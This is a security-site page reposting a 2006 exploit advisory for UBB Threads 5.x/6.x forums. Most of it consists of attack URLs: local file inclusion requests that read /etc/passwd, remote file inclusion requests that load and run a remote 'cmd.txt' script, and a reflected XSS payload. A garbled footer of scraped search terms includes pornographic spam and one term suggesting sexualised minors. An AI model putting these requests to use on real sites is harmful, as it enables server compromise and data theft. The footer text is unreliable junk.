about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , UBB Threads 5.x / 6.x Multiple Remote File Inclusion Vulnerabilities




2006-05-28 UBB Threads 5.x / 6.x Multiple Remote File Inclusion Vulnerabilities
Rated as : High Risk

UBBThreads 5.x,6.x Multiple File Inclusion Vulnerabilities
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploits works on UBBThreads 5.x,6.x
Original advisory can be found at: http://www.nukedx.com/?viewdoc=40
Succesful exploitation register_globals on
Version 6.x
GET ->
http://[site]/[ubbpath]/includepollresults.php?config[cookieprefix]=&w3t_language=[FILE]
EXAMPLE ->
http://[site]/[ubbpath]/includepollresults.php?config[cookieprefix]=&w3t_language=../../../../../etc/passwd%00
GET -> http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=[FILE]
EXAMPLE ->
http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=http://yoursite.com/cmd.txt?
EXAMPLE ->
http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=/etc/passwd%00
If php version < 4.1.0 or UBB version <= 5.x
GET -> http://[site]/[ubbpath]/ubbt.inc.php?thispath=[FILE]
EXAMPLE ->
http://[site]/[ubbpath]/ubbt.inc.php?thispath=http://yoursite.com/cmd.txt?
EXAMPLE ->
http://[site]/[ubbpath]/ubbt.inc.php?thispath=/etc/passwd%00
XSS:
GET -> http://[site]/[ubbpath]/index.php?debug=[XSS]
EXAMPLE ->
http://[site]/[ubbpath]/index.php?debug=<script>alert();</script>
securitydot.net - 2006-05-28

Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 15:21:45 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
GetPrinter 200 /compo tsunade se Download f php-nuke 2 GET /galle www.kuaile 200 /compo Donlowds s sexvidio Nana h07 Www.filems www.kwxs.c maxcpm.inf cook sex pictch www.377net Artiphp 4 modules/mx mambo Remo MALIKASERA vediosexi Download s Www.tw.com pinkdior.c www.sexlk pic sexi Sakura and Www.sesy v www.52cpp. Crack Data mambo Remo vet5.cn www.kaqise Freepusy sexvidous. free xxx v www.dirty preteen na hindi sex Serv-U news for c www.sexy b www.xianho www.zhaosh /search/ex all cartoo news for C gypsysexyp